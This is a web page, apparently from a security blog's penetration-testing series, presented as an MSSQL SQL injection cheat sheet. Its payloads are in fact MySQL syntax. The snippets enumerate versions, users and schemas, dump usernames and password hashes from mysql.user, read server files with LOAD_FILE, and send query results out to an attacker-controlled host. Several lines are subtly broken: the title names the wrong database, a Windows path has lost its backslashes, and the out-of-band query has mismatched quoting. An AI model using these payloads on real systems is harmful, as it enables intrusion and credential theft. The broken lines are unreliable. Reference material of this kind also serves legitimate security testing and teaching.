Web Application Security

SQL Injection Cheat Sheet: MSSQL

by HollyGraceful

MSSQL
MySQL

Comments
#
/*
-- -
;%00


Version
SELECT VERSION();
SELECT @@VERSION;
SELECT @@GLOBAL.VERSION;


User details
user()
current_user()
system_user()
session_user()
SELECT user,password FROM mysql.user;


Database details
SELECT db_name();
SELECT database();
SELECT schema_name FROM information_schema.schemata;


Database credentials
SELECT host, user, password FROM mysql.user;


Server details
SELECT @@hostname;


Table Name
SELECT table_name FROM information_schema.tables;


Columns Names
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';


No Quotes
CONCAT(CHAR(97), CHAR(98), CHAR(99))


String Concatenation
CONCAT(foo, bar)

 
Conditionals
SELECT IF(1=1,'true','false');

 
Time-delay
Sleep(10)


Command Execution
http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html


"RunAs"
N/A


Read Files
SELECT LOAD_FILE('C:Windowswin.ini');


Out-of-Band Retrieval
SELECT LOAD_FILE(concat('\\',(SELECT 1), 'attacker.controlledserver.com\')));


Substrings
SELECT substr(‘Foobr’, 1, 1);


Retrieve Nth Line
SELECT * FROM table ORDER BY ID LIMIT 3,1

This article is part of a Series, there are more to read below!
Basics and Defence
Exploitation
Filter Evasion with SQLmap
MySQL Cheat Sheet
MSSQL Cheat Sheet
Out-of-band Exploitation

You might also like

Introduction to Burp Suite Pro

SOP: Same-Origin Policy Basics

Burp Suite vs CSRF Tokens